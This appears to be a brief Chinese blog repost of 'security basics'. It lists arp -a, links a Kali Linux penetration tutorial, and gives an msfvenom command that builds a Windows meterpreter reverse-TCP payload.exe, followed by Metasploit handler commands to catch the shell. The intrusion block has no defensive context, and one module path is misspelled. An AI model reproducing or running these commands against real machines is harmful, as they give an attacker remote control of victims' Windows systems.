网络安全常识

1.

arp -a 查看局域网内所有ip地址

2.

大学霸 Kali Linux 安全渗透教程:https://wizardforcel.gitbooks.io/daxueba-kali-linux-tutorial/content/index.html

3.msfvenom 入侵windows命令

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.1.59 lport=443 -f exe -o  payload.exe
msfconsole
use exploit/muti/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost 192.168.1.59
set lport 443
exploit



猜你喜欢

转载自blog.csdn.net/luchengtao11/article/details/78573717